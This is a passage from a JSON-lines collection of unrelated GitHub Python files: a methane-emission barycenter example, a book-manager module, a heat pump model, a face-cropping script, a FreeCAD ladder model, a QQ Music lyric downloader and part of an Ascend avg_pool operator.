wind=wind[:, i],\n wind_factor=wind_factor, cost=\"wind_new\")\n\nreg = 0.0025\nreg_m = 0.5\n\nGtest = ot.barycenter_unbalanced(\n A.T, M, reg, reg_m, method=\"sinkhorn_stabilized\",\n stopThr=1e-4, log=True, verbose=True, tau=1e18)\nstart_time = time.time()\nG2D = barycenter_unbalanced_sinkhorn2D(\n Tot, Cx, Cy, reg, reg_m, weights=None,\n numItermax=300, stopThr=1e-4, verbose=True,\n log=True, logspace=False, reg_K=1e-16)\nprint(time.time()-start_time)\nG2Dw = barycenter_unbalanced_sinkhorn2D_wind(\n Tot, Cxs, Cys, reg, reg_m, weights=None, numItermax=300,\n stopThr=1e-4, verbose=True, log=True, logspace=False, reg_K=1e-16)\n# %%\ncm = 'OrRd'\nax1 = plt.subplot(141)\nplt.imshow(Tot.mean(axis=2), cmap=cm)\nplt.title(\"arithmetic mean\")\nax1 = plt.subplot(142)\nplt.imshow(Gtest[0].reshape((dimx, dimy)), cmap=cm)\nplt.title(\"POT 1D Wasserstein\")\nax1 = plt.subplot(143)\nplt.imshow(G2D[0], cmap=cm)\nplt.title(\"2D Wasserstein\")\nax1 = plt.subplot(144)\nplt.imshow(G2Dw[0], cmap=cm)\nplt.title(\"2D Wasserstein + wind\")\nplt.show()\n# %%\n","repo_name":"mathbarre/EmissionsAveraging","sub_path":"CH4Avg/examples/barycenter_sentinelS5P.py","file_name":"barycenter_sentinelS5P.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74490256166","text":"\"\"\"\nProject name: BOOK MANAGER\nAuthor: MENIN THIBAUT & KOCOGLU LUCAS\nDesc: This file is store functions of manage readers.\n\"\"\"\n\n######### MODULES / IMPORT #############\n\nfrom manage_system.manage_files import read_file, write_file\nfrom manage_system.manage_bookreaders import add_bookreader, remove_bookreader\nfrom manage_system.manage_book import del_indice\nfrom manage_system.utilities_func import *\n\nfrom suggestions.updater_matrix import update_rating_matrix, update_suggest_matrix\nfrom suggestions.manage_review import get_review_book\n\n######### MODULES / IMPORT #############\n\n######### SETTINGS #############\n\nfrom config import language\nif language == \"fr\":\n from languages.language_fr import 
*\nelif language == \"en\":\n from languages.language_en import *\n\n######### SETTINGS #############\n\n######### FUNCTIONS #############\n\ndef add_user():\n \"\"\"\n Add user in the file ./data/readers.txt and updates others data file\n \"\"\"\n\n print(text_add_user_separator)\n\n # Entrée utilisateur\n\n username, gender, age, preferences = ask_username(), ask_gender(), ask_age(), ask_preferences()\n temp = [username, gender, age, preferences]\n\n # Auto-update function : reader, bookreader, rating_matrix\n add_bookreader(username)\n write_file(\"readers_add\", temp)\n update_rating_matrix(\"add_user\", None)\n update_suggest_matrix(\"add_user\", None)\n\n return True\n\n\ndef remove_user(username=\"\"):\n \"\"\"\n Delete user in the file ./data/readers.txt and updates others data file\n \"\"\"\n\n # Import de la liste data\n data = read_file(\"readers\")\n\n while user_exist(username) is False:\n username = str(input(text_remove_user_input))\n if username in [\"exit\", \"Exit\", \"EXIT\", \"exit()\", \"Exit()\"]:\n return False\n\n print(text_remove_user_warning) \n while True:\n confirm = str(input(text_remove_user_warning_confirm))\n if confirm in [\"Yes\", \"yes\", \"y\", \"Y\", \"YES\", \"oui\", \"Oui\", \"o\", \"OUI\", \"O\"]:\n i = 0\n while (i < len(data)) and (data[i][0] != username):\n i += 1\n\n # Cas où l'utilisateur ne figure pas dans la base car i > len(data)\n if i > len(data):\n return False\n # Cas où l'utilisateur figure dans la base\n else:\n data.pop(i) # or del data[i]\n write_file(\"readers\", data)\n remove_bookreader(username)\n update_rating_matrix(\"remove_user\", i)\n update_suggest_matrix(\"remove_user\", i)\n quit() # Built-in function to exit the program\n elif confirm in [\"No\", \"no\", \"n\", \"N\", \"NO\", \"Non\", \"non\", \"NON\"]:\n return False\n\n\ndef user_exist(username):\n \"\"\"\n Verify if user exist in ./data/readers.txt\n \"\"\"\n\n # Import de la liste data\n data = read_file(\"readers\")\n\n for i in data:\n if i[0] == username:\n return True\n return False\n\n\ndef show_users(command=0):\n \"\"\"\n Show all user by their username ./data/readers.txt\n If the len exceed 15, divide into pages.\n \"\"\"\n data = read_file(\"readers\")\n\n nbdanspages = 15\n\n if len(data) <= nbdanspages:\n print(text_show_users_separator_1 + str(len(data)) + \" \" + text_show_users_separator_2)\n for i in range(len(data)):\n print(data[i][0])\n print(text_show_users_separator)\n else:\n pages = len(data) // nbdanspages\n page = 0\n\n while command != 3:\n\n if (page + 1) * nbdanspages > len(data):\n borne_a, borne_b = page * nbdanspages, len(data)\n else:\n borne_a, borne_b = page * nbdanspages, (page + 1) * nbdanspages\n\n print(text_show_users_separator_3 + \" \" + str(page + 1) + \"/\" + str(pages + 1) + text_show_users_separator_4)\n for i in range(borne_a, borne_b): # vérifier la relation entre page actuel et\n print(data[i][0])\n print(text_show_users_separator_3 + \" \" + str(page + 1) + \"/\" + str(pages + 1) + text_show_users_separator_4)\n\n if page == 0:\n commandes = {2: \"Page suivante\", 3: \"Exit\"}\n print(text_show_users_commands_1)\n elif page == pages:\n commandes = {1: \"Page précédente\", 3: \"Exit\"}\n print(text_show_users_commands_2)\n else:\n commandes = {1: \"Page précédente\", 2: \"Page suivante\", 3: \"Exit\"}\n print(text_show_users_commands_3)\n try:\n command = int(input(\"Your input : \"))\n except ValueError:\n pass\n\n if command not in commandes:\n pass\n elif command == 1:\n page -= 1\n elif command == 2:\n page += 1\n 
elif command == 3:\n return True\n\n return True\n\n\ndef modify_user(username=\"\", command=0):\n \"\"\"\n Menu manage user data in ./data/readers.txt\n \n Commandes : \n 1. Gender\n 2. Age\n 3. Preferences\n 4. Back to parent menu\n \"\"\"\n data = read_file(\"readers\")\n\n print(text_modify_user_separator)\n print(text_modify_user_input_request)\n while user_exist(username) is False:\n username = str(input(text_modify_user_input))\n\n # Index user in data\n\n index = position(data, username)\n\n commandes = {1: \"gender\", 2: \"age\", 3: \"preferences\", 4: \"back to main menu\"}\n\n print(text_modify_user_command)\n while command != 4:\n try:\n command = int(input(text_modify_user_input))\n except ValueError:\n pass\n\n if command not in commandes:\n pass\n\n elif command == 1:\n data[index][1] = ask_gender()\n print(text_modify_user_command)\n\n elif command == 2:\n data[index][2] = ask_age()\n print(text_modify_user_command)\n\n elif command == 3:\n data[index][3] = ask_preferences()\n print(text_modify_user_command)\n\n elif command == 4:\n pass\n\n write_file(\"readers\", data)\n return True\n\n\ndef show_profile(username=\"\"):\n \"\"\"\n Show profil of logged user # à modifier en username donné en input\n Show:\n username\n gender\n age\n preference\n list of books\n if user has no book readed:\n show: no books readed yet\n else:\n name of book (grade/5) + ...\n \"\"\"\n\n data_readers = read_file(\"readers\")\n data_bookreaders = read_file(\"booksread\")\n data_book = read_file(\"books\")\n\n while user_exist(username) is False:\n username = str(input(text_show_user_input))\n\n for i in data_readers:\n for j in i:\n if username == j:\n print(text_show_user_separator)\n print(text_show_user_username + str(i[0]))\n if i[1] == '1':\n print(text_show_user_gender_1)\n elif i[1] == '2':\n print(text_show_user_gender_2)\n elif i[1] == '3':\n print(text_show_user_gender_3)\n if i[2] == '1':\n print(text_show_user_age_1)\n elif i[2] == '2':\n print(text_show_user_age_2)\n elif i[2] == '3':\n print(text_show_user_age_3)\n if i[3] == '1':\n print(text_show_user_preference_1)\n elif i[3] == '2':\n print(text_show_user_preference_2)\n elif i[3] == '3':\n print(text_show_user_preference_3)\n elif i[3] == '4':\n print(text_show_user_preference_4)\n elif i[3] == '5':\n print(text_show_user_preference_5)\n elif i[3] == '6':\n print(text_show_user_preference_6)\n elif i[3] == '7':\n print(text_show_user_preference_7)\n print(text_show_user_books_readed, end=\"\")\n temp = []\n for i in data_bookreaders:\n if i[0] == username:\n for j in i[1:]:\n temp.append(j)\n data_book = del_indice(data_book)\n if temp == []:\n print(text_show_user_books_no_book_readed_yet)\n else:\n for i in temp:\n print(data_book[int(i)-1] + \" (\" + text_show_user_books_note + \" : \" + str(get_review_book(username, position(data_readers, username), int(i))) + \"/5)\", end=\" ; \")\n print(\"\\n\" + text_show_user_separator)\n return True\n return False\n\n######### FUNCTIONS #############\n\n","repo_name":"ItsLucas93/Projet-L1-S1","sub_path":"manage_system/manage_readers.py","file_name":"manage_readers.py","file_ext":"py","file_size_in_byte":8772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3000551125","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 19 16:45:15 2015\n\n@author: tsz\n\"\"\"\n\nfrom __future__ import division\n\nimport pycity_base.classes.supply.heating_device as HeatingDevice\nimport numpy as np\nfrom 
pycity_base.functions import handle_data as handleData\n\n\nclass Heatpump(HeatingDevice.HeatingDevice):\n \"\"\"\n Implementation of the heat pump.\n \"\"\"\n \n def __init__(self, environment, \n t_ambient, t_flow,\n heat, power, cop,\n t_max, lower_activation_limit=1):\n \"\"\"\n Parameters\n ----------\n environment : environment object\n Common to all other objects. Includes time and weather instances.\n t_ambient : array-like\n Outdoor ambient air temperature\n t_flow : array-like\n Heat pump's flow temperature\n heat : array-like (2 dimensional)\n Heat pump's heat power\n power : array-like (2 dimensional)\n Heat pump's electrical power\n cop : array-like (2 dimensional)\n Heat pump's coefficient of performance (cop)\n t_max : float\n Heat pump's nominal temperature\n lower_activation_limit : float (0 <= lower_activation_limit <= 1)\n Define the lower activation limit. For example, heat pumps are \n typically able to operate between 50 % part load and rated load. \n In this case, lower_activation_limit would be 0.5\n Two special cases: \n Linear behavior: lower_activation_limit = 0\n Two-point controlled: lower_activation_limit = 1\n \"\"\"\n \n q_nominal=np.zeros(environment.timer.timesteps_horizon)\n super(Heatpump, self).__init__(environment, \n q_nominal,\n t_max,\n lower_activation_limit)\n self._kind = \"heatpump\"\n \n self.t_ambient = t_ambient\n self.t_flow = t_flow\n self.heat = heat\n self.power = power\n self.cop = cop\n \n timesteps_total = environment.timer.timesteps_total\n timesteps_used_horizon = environment.timer.timesteps_used_horizon\n self.total_p_consumption = np.zeros(timesteps_total)\n self.current_p_consumption = np.zeros(timesteps_used_horizon)\n\n @property\n def kind(self):\n return self._kind\n \n def getNominalValues(self, t_flow):\n \"\"\"\n Return the nominal electricity consumption, heat output and lower \n activation limit.\n \n The electricity consumption and heat output are computed by two \n dimensional interpolation with the ambient temperature and required\n flow temperature as well as the heat pump's characteristics.\n \n Parameters\n ----------\n t_flow : array-like\n Required flow temperature\n \n Returns\n -------\n p_nominal : array-like\n Nominal electricity consumption at the given flow temperatures and\n the forecast of the current ambient temperature\n q_nominal : array-like\n Nominal heat output at the given flow temperatures and the \n forecast of the current ambient temperature\n t_max : float\n Maximum flow temperature that can be provided by the heat pump\n lower_activation_limit : float (0 <= lower_activation_limit <= 1)\n Define the lower activation limit. For example, heat pumps are \n typically able to operate between 50 % part load and rated load. 
\n In this case, lower_activation_limit would be 0.5\n Two special cases: \n Linear behavior: lower_activation_limit = 0\n Two-point controlled: lower_activation_limit = 1\n \n Examples\n --------\n >>> t_flow = building.getFlowTemperature()\n >>> (p_nominal, q_nominal, lower_activation_limit) = hp.getNominals(t_flow)\n \"\"\"\n # Get weather forecast\n weatherForecast = self.environment.weather.getWeatherForecast\n (t_ambient,) = weatherForecast(getTAmbient=True)\n \n # Two dimensional interpolation is required.\n # Initialize temporary results of the first interpolation\n timesteps_horizon = self.environment.timer.timesteps_horizon\n heat = np.zeros((timesteps_horizon, len(self.t_flow)))\n power = np.zeros((timesteps_horizon, len(self.t_flow)))\n \n # Compute first interpolation\n for i in range(len(self.t_flow)):\n heat[:,i] = np.interp(t_ambient, self.t_ambient, self.heat[:,i])\n power[:,i] = np.interp(t_ambient, self.t_ambient, self.power[:,i])\n \n # Initialize final results\n heatNominal = np.zeros(timesteps_horizon)\n powerNominal = np.zeros(timesteps_horizon)\n for j in range(timesteps_horizon):\n heatNominal[j] = np.interp(t_flow[j], self.t_flow, heat[j,:])\n powerNominal[j] = np.interp(t_flow[j], self.t_flow, power[j,:])\n \n # Return results\n return (powerNominal, heatNominal, \n self.t_max, self.lower_activation_limit)\n \n def getResults(self, currentValues=True):\n \"\"\"\n Return results.\n \n Parameters\n ----------\n currentValues : boolean, optional\n - True : Return only values for this scheduling period\n - False : Return values for all scheduling periods\n \n Returns\n -------\n pConsumption : array-like\n Electricity consumption of the heat pump\n qOutput : array-like\n Heat production of the heat pump\n schedule : array-like\n Operational schedule\n \"\"\"\n pConsumption = handleData.getValues(currentValues, \n self.current_p_consumption,\n self.total_p_consumption)\n \n return (pConsumption,\n self._getQOutput(currentValues), \n self._getSchedule(currentValues))\n\n def setResults(self, pConsumption, qOutput, schedule):\n \"\"\"\n Save resulting electricty consumption, heat output and \n operational schedule.\n \"\"\"\n self._setSchedule(schedule)\n self._setQOutput(qOutput)\n result = handleData.saveResult(self.environment.timer, \n self.current_p_consumption,\n self.total_p_consumption,\n pConsumption)\n (self.current_p_consumption, self.total_p_consumption) = result\n","repo_name":"RWTH-EBC/pyCity","sub_path":"pycity_base/classes/supply/heat_pump.py","file_name":"heat_pump.py","file_ext":"py","file_size_in_byte":6744,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"31861458906","text":"from checkFile import checkFile\nfrom summaryReport import summaryReport\nfrom vocReport import promoterReport\n\ndef createReport(path):\n\n filename = path.split(\"\\\\\")[1]\n if checkFile(path):\n # summary = summaryReport(path)\n # promoters = promoterReport(path)\n print(filename)\n\n # with open(\"Key_Data_{}.txt\".format(), \"a\") as lst_file:\n # lst_file.writelines(summary)\n # lst_file.writelines(promoters)\n # lst_file.close() \n\n with open(\"file.lst\", \"a\") as lst_file:\n lst_file.writelines(\"\\n\" + filename)\n lst_file.close()\n\n\npath = 
'MonthlyReports\\expedia_report_monthly_march_2018.xlsx'\ncreateReport(path)","repo_name":"hzeig/Smoothstack","sub_path":"monthly_reports_requests_project/createReport.py","file_name":"createReport.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23217402146","text":"wolfs = set(\"w\" * i + \"o\" * i + \"l\" * i + \"f\" * i for i in range(1, 13))\n\n\nline = input()\nindex = 0\nwhile index < len(line):\n flag = False\n for w in wolfs:\n if line[index:].startswith(w):\n index += len(w)\n flag = True\n if not flag:\n break\n\nprint(1 if index == len(line) else 0)\n","repo_name":"mozzieongit/Bike-Project","sub_path":"boj/prob13022.py","file_name":"prob13022.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20011000092","text":"from skimage.io import imread, imshow\nfrom skimage.transform import resize\nfrom skimage.feature import hog\nfrom skimage import exposure\nimport matplotlib.pyplot as plt\nimport sys\nimport cv2\nimport os\nimport numpy as np\nimport ntpath\n\n\n\nCASCADE_PATH = \"fr_env/lib/python3.8/site-packages/cv2/data/haarcascade_frontalface_default.xml\"\n\ndef display_image(img):\n plt.imshow(img)\n plt.show()\n\ndef path_leaf(path):\n head, tail = ntpath.split(path)\n return tail or ntpath.basename(head)\n\n\n\n\n\n\n\nif len(sys.argv) < 2:\n print(\"no input image\")\n exit(1)\nif len(sys.argv) < 3:\n print(\"no output folder\")\n exit(1)\nop_path = sys.argv[2]\nprint(sys.argv[1])\nraw_img = cv2.imread(sys.argv[1])\nprint(raw_img.shape)\nimg = cv2.cvtColor(raw_img, cv2.COLOR_BGR2GRAY)\nprint(img.shape)\n\n# resized_img = resize(img,(1000,1000))\nresized_img =img\nprint(resized_img.shape)\n# display_image(resized_img)\n\n\nface_classifier = cv2.CascadeClassifier(CASCADE_PATH)\n\n# resized_img = np.array(resized_img, dtype='uint8')\nfaces = face_classifier.detectMultiScale(resized_img, 1.3,3) ### (inp_img, scaling_factor, minNeighbours )\nprint(len(faces))\nif len(faces) == 0:\n print(\"No faces found\")\nind = 0\nfor (x,y,w,h) in faces:\n cv2.rectangle(resized_img, (x,y), (x+w,y+h), (127,0,255), 2 )\n cropped = resized_img[y:y+h, x:x+w]\n # cv2.imshow('Face', cropped)\n cv2.imwrite( op_path + \"/faceof_\"+str(ind)+path_leaf(sys.argv[1]),cropped)\n # print(\"***\", op_path, op_path + \"/faceof_\"+str(ind)+path_leaf(sys.argv[1]))\n ind+=1\n # cv2.waitKey(0)\n\ncv2.destroyAllWindows()","repo_name":"jha11aditya/facial_recognition","sub_path":"face_cutter.py","file_name":"face_cutter.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20793435012","text":"import numpy as np\nfrom FreeCAD import Placement, Vector, Rotation\nimport Draft\n \ndoc = App.ActiveDocument\n\n\ndef get_box(dims=[1, 1, 1], shift=[0, 0, 0]):\n box = doc.addObject(\"Part::Box\",\"Box\")\n box.Placement.move(Vector(shift))\n box.Length, box.Width, box.Height = dims\n return box\n\n\ndef get_L(length, width, thickness, left=True, shift=[0, 0, 0]):\n shift = np.array(shift)\n box1 = get_box([length, width, width], shift = shift)\n if left:\n shift2 = shift + np.array([0, thickness, thickness])\n else:\n shift2 = shift + np.array([0, -thickness, thickness])\n box2 = get_box([length, width, width], shift = shift2) \n cut = doc.addObject(\"Part::Cut\",\"Cut\")\n cut.Base = box1\n cut.Tool = box2\n return 
cut\n\ndef get_rails(length, thickness, width, distance, shift=[0,0,0]):\n shift = np.array(shift)\n left = get_L(length, width, thickness, shift = shift)\n shift = shift + [0, distance - width, 0]\n right = get_L(length, width, thickness, shift=shift, left=False)\n return (left, right)\n\n#get_rails(length = 3887, thickness = 5, width = 50, distance=1610)\n\ndef make_steps(rail_dist, step_rail_gap, step_diam, first_step, padding,\n L_thickness, n_steps, step_dist):\n step_length = rail_dist - 2*L_thickness - 2 * step_rail_gap\n cyl = doc.addObject(\"Part::Cylinder\",\"Cylinder\")\n cyl.Height = step_length\n cyl.Radius = step_diam / 2\n shift = [first_step, (rail_dist - step_length) / 2,\n step_diam / 2 + padding + L_thickness]\n cyl.Placement = Placement(Vector(shift), Rotation(Vector(1, 0, 0), -90))\n \n obj = Draft.makeArray(cyl,Vector(step_dist,0,0),Vector(0,1,0),n_steps, 1)\n Draft.autogroup(obj)\n return obj\n\n##make_steps(\n## rail_dist = 1610,\n## step_rail_gap = 10,\n## step_diam = 30,\n## first_step = 100,\n## padding = 1,\n## L_thickness = 5,\n## n_steps = 10,\n## step_dist = 300,\n##)\n\n\ndef get_ladder(length, rail_dist, step_rail_gap, step_diam, first_step,\n padding,L_thickness, L_width, step_dist):\n rails = get_rails(length=length, thickness=L_thickness,\n width=L_width, distance=rail_dist)\n n_steps = (length - first_step) // step_dist + 1\n steps = make_steps(\n rail_dist=rail_dist, step_rail_gap=step_rail_gap,\n step_diam=step_diam,\n first_step=first_step,\n padding=padding,\n L_thickness=L_thickness,\n n_steps=n_steps,\n step_dist=step_dist,\n )\n return rails, steps\n\n\n\nget_ladder(\n length = 3887,\n rail_dist = 1610,\n step_rail_gap = 10,\n step_diam = 30,\n first_step = 100,\n padding = 1,\n L_thickness = 5,\n L_width = 50,\n step_dist = 300,\n)\n","repo_name":"PistaSaki/hrazda","sub_path":"drawings/hrazda.py","file_name":"hrazda.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19170496103","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@Author : tanke\n@Time : 2020/7/1 15:51\n\"\"\"\n\nimport os\nimport requests\nimport json\nfrom requests.adapters import HTTPAdapter\nimport time\nimport sys\nimport threading\nimport math\nfrom threading import Thread\nimport opencc\nimport base64\nfrom html.parser import HTMLParser\nimport html\nimport taglib\n\nimport os\n\nlrc_suffix = \"lrc\"\n\n\ndef lrc_QQ(title, artist):\n song_name = str(title.encode('utf-8'))\n song_name = song_name.replace('\\\\x', '%')[:-1]\n song_name = song_name[2:]\n\n url = 'https://c.y.qq.com/soso/fcgi-bin/client_search_cp?aggr=1&cr=1&flag_qc=0&p=1&n=15&w=' + song_name\n\n res = requests.get(url)\n response = json.loads(res.text.replace('callback(', '')[:-1])['data']['song']['list']\n song_ns = []\n singer_li = []\n for index, i in enumerate(response):\n singer_n = []\n for x in i['singer']:\n singer_n.append(x['name'])\n song_ns.append((index, '歌名: {}\\n'.format(i['songname']) + '歌手: ' + ' & '.join(singer_n) + '\\n'))\n\n out = -1\n\n for index, i in enumerate(song_ns):\n print(\"{}: {}\".format(index+1, i[1]))\n choice = int(input('请输入歌曲编号,不是输入0: ')) - 1\n if 0 <= choice < len(i):\n out = choice\n else:\n return None\n mid = response[out]['songmid']\n for i in response[out]['singer']:\n singer_li.append(i['name'])\n url = 
'https://c.y.qq.com/lyric/fcgi-bin/fcg_query_lyric_yqq.fcg?nobase64=1&musicid={}&-=jsonp1&g_tk=5381&loginUin=0&hostUin=0&format=json&inCharset=utf8&outCharset=utf-8&notice=0&platform=yqq.json&needNewCode=0'.format(\n response[out]['songid'])\n headers = {\n 'Accept': 'application/json, text/javascript, */*; q=0.01',\n 'Origin': 'https://y.qq.com',\n 'Referer': 'https://y.qq.com/n/yqq/song/' + mid + '.html',\n # 'User-Agent':' Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'\n }\n res = requests.get(url, headers=headers) #\n h = HTMLParser()\n return html.unescape(res.json()['lyric'])\n\n\n\ndef scan_dictionary(path):\n files = os.listdir(path)\n for file in files:\n if not os.path.isdir(file):\n filename, type = os.path.splitext(file)\n if not os.path.exists(\"{}/{}.{}\".format(path, filename, lrc_suffix)):\n song = taglib.File('{}/{}'.format(path, file))\n if 'TITLE' in song.tags and len(song.tags['TITLE']) > 0:\n title = song.tags['TITLE'][0]\n else:\n title = filename\n if 'ARTIST' in song.tags and len(song.tags['ARTIST']) > 0:\n artist = song.tags['ARTIST'][0]\n else:\n artist = \"\"\n content = lrc_QQ(title, artist)\n if content == None:\n pass\n else:\n with open('{}/{}.{}'.format(path, filename, lrc_suffix), 'w', encoding='utf-8') as f:\n f.write(content)\n\n\n\nif __name__ == \"__main__\":\n scan_dictionary(\"D:\\\\music\")\n\n\n# print('''\n# This tool currently supports lyric downloads from NetEase Cloud Music and QQ Music\n# For updates, please visit https://github.com/gongxi-cn-ln-dl/QQmusic-Lrc_downloader\n# Thanks for using it!''')\n# time.sleep(3)\n# os.system('cls')\n# cho = input('''\n# Please choose a player\n# 1. NetEase Cloud Music\n# 2. QQ Music''')\n# if cho == '1':\n# lrc_163(input('Enter a song title: '))\n# elif cho == '2':\n# lrc_QQ(input('Enter a song title: '), 'song')\n# else:\n# print('Please enter again!')","repo_name":"slxxtanke/lyric_auto_generator","sub_path":"get_lyric.py","file_name":"get_lyric.py","file_ext":"py","file_size_in_byte":3550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"8643197346","text":"import te.lang.cce\nfrom te import tvm\nfrom te.utils.op_utils import *\nfrom topi import generic\nfrom te.platform.cce_policy import get_L1_info\nfrom te.utils.error_manager import error_manager_util as err_man\n\n\ndef get_fusion_params(input_data, output_data, is_fused_compute=True):\n \"\"\"\n :param input_data: tensor of input_data\n :param output_data: dict of output_data\n :return: dict fusion_params\n \"\"\"\n # l1 fusion params assign\n # 0: L1 depth fusion, 1: L1 width fusion, -1: no L1 fusion\n l1_fusion_type = input_data.op.attrs[\"L1_fusion_type\"].value \\\n if \"L1_fusion_type\" in input_data.op.attrs else -1\n in_l1_flag = input_data.op.attrs[\"addr_type\"].value == 1 \\\n if \"addr_type\" in input_data.op.attrs else False\n in_valid_shape = input_data.op.attrs[\"valid_shape\"] \\\n if \"valid_shape\" in input_data.op.attrs else []\n in_slice_offset = input_data.op.attrs[\"slice_offset\"] \\\n if \"slice_offset\" in input_data.op.attrs else []\n in_select_read_flag = bool(in_valid_shape)\n in_split_index = input_data.op.attrs[\"split_index\"].value \\\n if \"split_index\" in input_data.op.attrs else 0\n out_l1_flag = output_data.get(\"addr_type\") == 1\n fusion_params = {\"is_fused_compute\": is_fused_compute,\n \"l1_fusion_type\": l1_fusion_type,\n \"in_l1_flag\": in_l1_flag,\n \"out_l1_flag\": out_l1_flag,\n \"in_select_read_flag\": in_select_read_flag,\n \"in_split_index\": in_split_index,\n \"in_slice_offset\": in_slice_offset}\n\n return fusion_params\n\n\ndef shape_to_list(shape):\n 
\"\"\"\n translate tvm.shape to list type in python\n \"\"\"\n if isinstance(shape, (list, tuple)):\n return shape\n tmp = []\n if shape == \"\":\n return ()\n for i in shape:\n tmp.append(i.value)\n return tmp\n\n\ndef avgpool_conv2d_fusion_para(inputs, outputs):\n \"\"\"\n get L1 fusion para for depthwise_conv2d\n \"\"\"\n input_memory_type = inputs.op.attrs[\"addr_type\"] \\\n if \"addr_type\" in inputs.op.attrs else 0\n output_memory_type = outputs[\"addr_type\"] \\\n if \"addr_type\" in outputs else 0\n valid_shape = inputs.op.attrs[\"valid_shape\"] \\\n if \"valid_shape\" in inputs.op.attrs else ()\n slice_offset = inputs.op.attrs[\"slice_offset\"] \\\n if \"slice_offset\" in inputs.op.attrs else ()\n l1_fusion_type = inputs.op.attrs[\"L1_fusion_type\"] \\\n if \"L1_fusion_type\" in inputs.op.attrs else -1\n\n fmap_l1_addr_flag = inputs.op.attrs[\"L1_addr_flag\"] \\\n if \"L1_addr_flag\" in inputs.op.attrs else -1\n fmap_l1_valid_size = inputs.op.attrs[\"L1_valid_size\"] \\\n if \"L1_valid_size\" in inputs.op.attrs else -1\n\n l1_fusion_enable_flag = get_L1_info(\"L1_fusion_enabled\")\n if not l1_fusion_enable_flag:\n l1_fusion_type = -1\n\n valid_shape = shape_to_list(valid_shape)\n slice_offset = shape_to_list(slice_offset)\n\n if not l1_fusion_enable_flag:\n input_memory_type = 0\n output_memory_type = 0\n valid_shape = []\n slice_offset = []\n l1_fusion_type = -1\n\n if int(input_memory_type) not in (0, 1, 2):\n err_man.raise_err_input_mem_type(\"depthwise_conv2d\",\n input_memory_type)\n if int(output_memory_type) not in (0, 1, 2):\n err_man.raise_err_output_mem_type(\"depthwise_conv2d\",\n output_memory_type)\n if valid_shape and not slice_offset:\n err_man.raise_err_specific_user(\n \"depthwise_conv2d\",\n \"if valid_shape exists slice_offset can not be []\")\n\n fusion_para = {\"input_memory_type\": input_memory_type,\n \"output_memory_type\": output_memory_type,\n \"valid_shape\": valid_shape,\n \"slice_offset\": slice_offset,\n \"l1_fusion_type\": l1_fusion_type,\n \"fmap_l1_addr_flag\": fmap_l1_addr_flag,\n \"fmap_l1_valid_size\": fmap_l1_valid_size}\n\n return fusion_para\n\n\n# pylint: disable=locally-disabled,too-many-arguments,too-many-statements\n# pylint: disable=locally-disabled,unused-argument,invalid-name,too-many-locals\ndef check_window_rule(ksize, strides, data_format):\n \"\"\"\n check ksize and strides of window in pooling\n \"\"\"\n if data_format in (\"NHWC\",):\n if len(ksize) != 4:\n errorInfo = {}\n errorInfo['errCode'] = OP_ERROR_CODE_012\n errorInfo['op_name'] = 'avg_pool'\n errorInfo['param_name'] = 'ksize'\n errorInfo['min_value'] = '4'\n errorInfo['max_value'] = '4'\n errorInfo['real_value'] = len(ksize)\n raise RuntimeError(errorInfo,\n \"In op[%s], the num of dimensions of input[%s]\"\n \"should be in the range of [%s, %s],\"\n \"but actually is [%s].\" %\n (errorInfo['op_name'], errorInfo['param_name'],\n errorInfo['min_value'], errorInfo['max_value'],\n errorInfo['real_value']))\n\n elif ksize[0] != 1 or ksize[3] != 1:\n errorInfo = {}\n errorInfo['errCode'] = OP_ERROR_CODE_000\n errorInfo['op_name'] = 'avg_pool'\n errorInfo['param_name'] = \",\".join((\"ksize[1]\", \"ksize[3]\"))\n errorInfo['expected_value'] = '1'\n errorInfo['real_value'] = \",\".join((ksize[1], ksize[3]))\n raise RuntimeError(\"In op[%s], the parameter[%s] should be [%s], \"\n \"but actually is [%s].\" %\n (errorInfo['op_name'], errorInfo['param_name'],\n errorInfo['expected_value'],\n errorInfo['real_value']))\n if len(strides) != 4:\n errorInfo = {}\n errorInfo['errCode'] 
= OP_ERROR_CODE_012\n errorInfo['op_name'] = 'avg_pool'\n errorInfo['param_name'] = 'strides'\n errorInfo['min_value'] = '4'\n errorInfo['max_value'] = '4'\n errorInfo['real_value'] = len(strides)\n raise RuntimeError(errorInfo,\n \"In op[%s], the num of dimensions of input[%s]\"\n \"should be in the range of [%s, %s],\"\n \"but actually is [%s].\" %\n (errorInfo['op_name'], errorInfo['param_name'],\n errorInfo['min_value'], errorInfo['max_value'],\n errorInfo['real_value']))\n elif strides[0] != 1 or strides[3] != 1:\n errorInfo = {}\n errorInfo['errCode'] = OP_ERROR_CODE_000\n errorInfo['op_name'] = 'avg_pool'\n errorInfo['param_name'] = \",\".join((\"strides[1]\", \"strodes[3]\"))\n errorInfo['expected_value'] = '1'\n errorInfo['real_value'] = \",\".join((strides[1], strides[3]))\n raise RuntimeError(\"In op[%s], the parameter[%s] should be [%s],\"\n \" but actually is [%s].\" %\n (errorInfo['op_name'], errorInfo['param_name'],\n errorInfo['expected_value'],\n errorInfo['real_value']))\n elif data_format in (\"NC1HWC0\", \"NCHW\"):\n if len(ksize) != 4:\n errorInfo = {}\n errorInfo['errCode'] = OP_ERROR_CODE_012\n errorInfo['op_name'] = 'avg_pool'\n errorInfo['param_name'] = 'ksize'\n errorInfo['min_value'] = '4'\n errorInfo['max_value'] = '4'\n errorInfo['real_value'] = len(ksize)\n raise 